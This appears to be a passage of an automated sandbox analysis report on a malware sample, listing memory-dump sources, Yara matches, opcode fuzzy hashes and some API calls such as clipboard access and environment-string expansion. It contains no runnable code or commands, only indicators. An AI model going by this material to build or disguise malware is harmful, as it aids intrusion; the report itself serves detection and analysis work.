                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a314761aca0b15bac0e499197e5654b3e3b027ff94c755a816ee124af95c710
                                                      • Instruction ID: 25c224d9c6e51faf402677c1655b759f377f19c2bba33517014d4afba9f44703
                                                      • Opcode Fuzzy Hash: 5a314761aca0b15bac0e499197e5654b3e3b027ff94c755a816ee124af95c710
                                                      • Instruction Fuzzy Hash: 07316934610B028FC325CF68C290AA6F7F2FF8A714725A55EC4868BB71DB71B852CB44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a314761aca0b15bac0e499197e5654b3e3b027ff94c755a816ee124af95c710
                                                      • Instruction ID: e7300225e8a177318780e90d9b68b89d612950984cb2efd66ae4e33f8a06940f
                                                      • Opcode Fuzzy Hash: 5a314761aca0b15bac0e499197e5654b3e3b027ff94c755a816ee124af95c710
                                                      • Instruction Fuzzy Hash: AA314835611B02CFC324CF28C580AA6B3F2FF8A714765956EC5868B761DB31B896CB48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 73c16953a7693468cce625ce5520dbc63db12e11d5890ae801d714f42f0ac173
                                                      • Instruction ID: eceb05a2e16bb6353faa5eeb70f47ffbe9761b3e3da56a5d21f55304e0877f67
                                                      • Opcode Fuzzy Hash: 73c16953a7693468cce625ce5520dbc63db12e11d5890ae801d714f42f0ac173
                                                      • Instruction Fuzzy Hash: 38219CB6640B018BDB28CFA5C490662B3F2FF4A304719D95EC8868BB55D734E806CB10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 73c16953a7693468cce625ce5520dbc63db12e11d5890ae801d714f42f0ac173
                                                      • Instruction ID: 11437681611e05a0f7561572364b2723825494176b9a61f6ded9fb7c35aad996
                                                      • Opcode Fuzzy Hash: 73c16953a7693468cce625ce5520dbc63db12e11d5890ae801d714f42f0ac173
                                                      • Instruction Fuzzy Hash: 2B215CB5600B018BD724CF15C491663B3F2FF4A300759896ED8D68BB55D738E84ACB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ecf9b6fc57c0365a65e17dac294f269cfe26d652c6cd93349b59fb0be8332a30
                                                      • Instruction ID: 228e7331a5df080f04b00836214a1f885568500aa95c5db08ebb868edef6782f
                                                      • Opcode Fuzzy Hash: ecf9b6fc57c0365a65e17dac294f269cfe26d652c6cd93349b59fb0be8332a30
                                                      • Instruction Fuzzy Hash: C5216B746483429BE710CF04C994B2FB7F2BBC2B0CF64991CE5959B286C7B5D805CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 614f285c47a44a509acd1fb7f416737829ba53880da428a92352acdfcff60832
                                                      • Instruction ID: 6c6e969ff358eea6be33e44d0976b42ae2114fc928fd19e1847bd506b019d8c4
                                                      • Opcode Fuzzy Hash: 614f285c47a44a509acd1fb7f416737829ba53880da428a92352acdfcff60832
                                                      • Instruction Fuzzy Hash: FA217F74159B818BD769CB24C8A47A3BBF2BF87309F48659CC0D30BB86C775650ACB45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 614f285c47a44a509acd1fb7f416737829ba53880da428a92352acdfcff60832
                                                      • Instruction ID: 6f77e30a321d026a9acbd953c90a2d9133533e1004874743f08a9f15404b72cd
                                                      • Opcode Fuzzy Hash: 614f285c47a44a509acd1fb7f416737829ba53880da428a92352acdfcff60832
                                                      • Instruction Fuzzy Hash: A8216834219B918BD76ACB24D8A47A3BBE2FF87305F98558DC0D30BB86C7796406CB45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                      • Instruction ID: 49746be4b88055e9fa6f257d265c1eb33f59235827f07f3092c0d8b20b2981f4
                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                      • Instruction Fuzzy Hash: A911C633A851D40DC316CD3C84205A5BFE34A97179B69D399E4B99B6D6C7228D8B8350
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                      • Instruction ID: b73ac011751cc30cde1660d2e37339d0245df53a3d7c422b31ac8128b6be4b8c
                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                      • Instruction Fuzzy Hash: 4411EC33B051E40EC3158D3C9400566BFB30AA3635FD943BAF4F8972D6D6268D8E9359
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c0ab9d8e908ed14464d132a5d134827dfa759970a7a258c788b99254c2195891
                                                      • Instruction ID: 96ee0f27bc440daf7790fd41d81558f743fd83515d64296b399dfb72fc64ccea
                                                      • Opcode Fuzzy Hash: c0ab9d8e908ed14464d132a5d134827dfa759970a7a258c788b99254c2195891
                                                      • Instruction Fuzzy Hash: 7E11A1B19583459BD310DF68C98476BF7E8FF8A308F18992CE8C993290E7B5D444CB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BF7000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bf7000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                      • Instruction ID: f7c51fbb6d5851c2e7e8364cd2e3e48050a5d84e7e1492e3bbd827b944828aab
                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                      • Instruction Fuzzy Hash: 84118272340200AFD744DF55DC80FA6B3EAEB88360B1A80D5EE14CB316DB75E902C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb7a5bff1dbd84864c30aed502843d58e4c4bf03eb07ee31482e7b1e4368703c
                                                      • Instruction ID: 7c154c59aa59b9fcce8cd9a0c4ca02e17765b0c5ab3a0b312499a44479fbf2d8
                                                      • Opcode Fuzzy Hash: bb7a5bff1dbd84864c30aed502843d58e4c4bf03eb07ee31482e7b1e4368703c
                                                      • Instruction Fuzzy Hash: A3113D71644B808BD329CF24C8A4BABBBF1FB02344F44591DD9D797A82D3BAF4498B45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb7a5bff1dbd84864c30aed502843d58e4c4bf03eb07ee31482e7b1e4368703c
                                                      • Instruction ID: 348a8ba48f1a2f0327b4d46336ec4528d420831e24f9bfe180b1afd1f7eb374e
                                                      • Opcode Fuzzy Hash: bb7a5bff1dbd84864c30aed502843d58e4c4bf03eb07ee31482e7b1e4368703c
                                                      • Instruction Fuzzy Hash: 60113D71605B808BD329CF24C8A4BABBBF0FB02344F44491ED5D797A92D3BAF4498B45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
                                                      • Instruction ID: 9abff62a7f5fece3e63d8f9a6a2c1fe54c9b42290d485bf0640d6e23e52587dc
                                                      • Opcode Fuzzy Hash: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
                                                      • Instruction Fuzzy Hash: F71109B05183419FD304CF14C495B1BBBE1BF86319F459A2DF8D99B241C779C9068B86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
                                                      • Instruction ID: e6a21cfd48ccecce0c7a3d54777b2644280168018e78a496dfdad913fb49de2b
                                                      • Opcode Fuzzy Hash: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
                                                      • Instruction Fuzzy Hash: 661109715183419FD304CF14D495B1BBBE1BB8A318F458A2DF4D5AB241C778D9058B4A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                      • Instruction ID: 8ba7e61abdc42f6b9289604f31a2cb28f4e9514f58fcdfbad42190fa04c2bbea
                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                      • Instruction Fuzzy Hash: 1701A276A506048FDF22CF24C805BEB33E5FF8631AF4595A5D90A97281E774B9418B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
                                                      • Instruction ID: 58aab6250364a20eb92433d0f2273b376decf5787ba6329865823b164b9f4f8d
                                                      • Opcode Fuzzy Hash: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
                                                      • Instruction Fuzzy Hash: 1AD01265D44144C7DE09DA20EC509BB7267DF56304F28B238D49753325EA21A919C945
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
                                                      • Instruction ID: de3ce6f7ae6e3d5ea65c66cf0705fbc442ae878a1daf767fd50fb3e27dbea20b
                                                      • Opcode Fuzzy Hash: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
                                                      • Instruction Fuzzy Hash: 1AD0C264D04500C7D608DA20FC4196A7222DBA130CF28653DD496232A6E930AD198549
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                      • Instruction ID: 4424c7b2dcc8559f920d32005bf51fbec177e9a3b23430fd36a3322922f1f82d
                                                      • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                      • Instruction Fuzzy Hash: C8D0A7615887A10E97598D3808A08BBFBF4ED4751AB18749EE4D1E310AD320D8018698
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                      • Instruction ID: ef5f6f15fdba078049cde65a2549cec0935e602115ccd1401630279531ef5664
                                                      • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                      • Instruction Fuzzy Hash: 77D0A771A487A10E97588D7808A0477FBE8E947712F1814AFE4D5F7249D638DC05869C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00cfa2a1bd9d8d6983a05bc107cc555247b033b7bebdd7e79f52daa53810972e
                                                      • Instruction ID: fc63ff7144db230d088183717acfc14d3aba176eca07f96b411a1d117e3a196b
                                                      • Opcode Fuzzy Hash: 00cfa2a1bd9d8d6983a05bc107cc555247b033b7bebdd7e79f52daa53810972e
                                                      • Instruction Fuzzy Hash: 62D0127795180A4A9621CF24D981471A7229BC3354734A3444A21633F6DD30D837598C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
                                                      • Instruction ID: e75f760344972e11c8b48404786a159fb0baaeb0a6ce8aec3f61412875dfe28a
                                                      • Opcode Fuzzy Hash: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
                                                      • Instruction Fuzzy Hash: 88C09B1085C9C04BD75DCF245C7E5B5FF354D43144E18B0AEC1931B897E150944D434E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
                                                      • Instruction ID: 7bd2b15116bf5bad7ca5f628bad3fa516ab478f3cf40b7ce66427aac778f7d1a
                                                      • Opcode Fuzzy Hash: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
                                                      • Instruction Fuzzy Hash: 46C0923CF5D0509FD604DF1AFA51435B2BAABCB305B15F0349006A32ADCE39D8078A0D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
                                                      • Instruction ID: a844afcd4e6ff2ab95c3bf38cf52fa4fa5fdc2b1da169be5a4aa5f8981b8c5b9
                                                      • Opcode Fuzzy Hash: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
                                                      • Instruction Fuzzy Hash: E3C0922CE990509FD610EF16FA40472B6BAABC7205B15F0208102673ADDE39E807CB8D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
                                                      • Instruction ID: e75f760344972e11c8b48404786a159fb0baaeb0a6ce8aec3f61412875dfe28a
                                                      • Opcode Fuzzy Hash: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
                                                      • Instruction Fuzzy Hash: 88C09B1085C9C04BD75DCF245C7E5B5FF354D43144E18B0AEC1931B897E150944D434E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
                                                      • Instruction ID: 7bd2b15116bf5bad7ca5f628bad3fa516ab478f3cf40b7ce66427aac778f7d1a
                                                      • Opcode Fuzzy Hash: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
                                                      • Instruction Fuzzy Hash: 46C0923CF5D0509FD604DF1AFA51435B2BAABCB305B15F0349006A32ADCE39D8078A0D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
                                                      • Instruction ID: 5c4c2a12a684bc4ff0d5a99ec30874bcdf27f0d0682448e5fdc4a84297f01b14
                                                      • Opcode Fuzzy Hash: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
                                                      • Instruction Fuzzy Hash: 87C0926CE9D0609FD200DF17FA40431B2BAABDB305B25F0218041632ADCA3AD8078B0E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$CloseDataInfoOpenWindow
                                                      • String ID: 7$8$9$:$;
                                                      • API String ID: 2278096442-1017836374
                                                      • Opcode ID: 74b12f2f732ecc3c7309316f3b7c55f5d553d6d58d37218b91022f32d727fac6
                                                      • Instruction ID: db800bf9a790f6cf69fa27df402ec549b3fd6bc32968a4d5801b0717b3c88da0
                                                      • Opcode Fuzzy Hash: 74b12f2f732ecc3c7309316f3b7c55f5d553d6d58d37218b91022f32d727fac6
                                                      • Instruction Fuzzy Hash: A551AD70548780CFD720DF38C1857A6BBE4AF05394F14EA5ED8DA8B686D335E906CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 02ECD9E4
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 02ECDA0F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: -^$AV$SE$X&
                                                      • API String ID: 237503144-3017178743
                                                      • Opcode ID: 88672712ba695551f4c2e9363b205b4fc2188bcfb2a8aaf974e2784d1cbba389
                                                      • Instruction ID: f154b38d540b401cb13c12ad6fbc442d6f4a57b95d5966f9d5658366b7b2ffd5
                                                      • Opcode Fuzzy Hash: 88672712ba695551f4c2e9363b205b4fc2188bcfb2a8aaf974e2784d1cbba389
                                                      • Instruction Fuzzy Hash: BA718E742483418FE724CF14C8A0BABB7E1EFC6358F118A2CE8E95B290D7759546CB97
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02EC4C04
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 02EC4C35
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: 2M#O$<Y.[$r]Nm$qrs
                                                      • API String ID: 237503144-2765572984
                                                      • Opcode ID: b4209384774e64906f4bd2642607d0db43ac134c72471375abf5c82cf001131c
                                                      • Instruction ID: 794d5b1beb98e185947c26800d6db8b7944fb99ad8aef17cf347458f625980fb
                                                      • Opcode Fuzzy Hash: b4209384774e64906f4bd2642607d0db43ac134c72471375abf5c82cf001131c
                                                      • Instruction Fuzzy Hash: 6851E3B46483409BD720CF54C8A1BABB7F5EFC6324F05991CF9858B2D1E3B49801CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 02ECE2F4
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 02ECE323
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
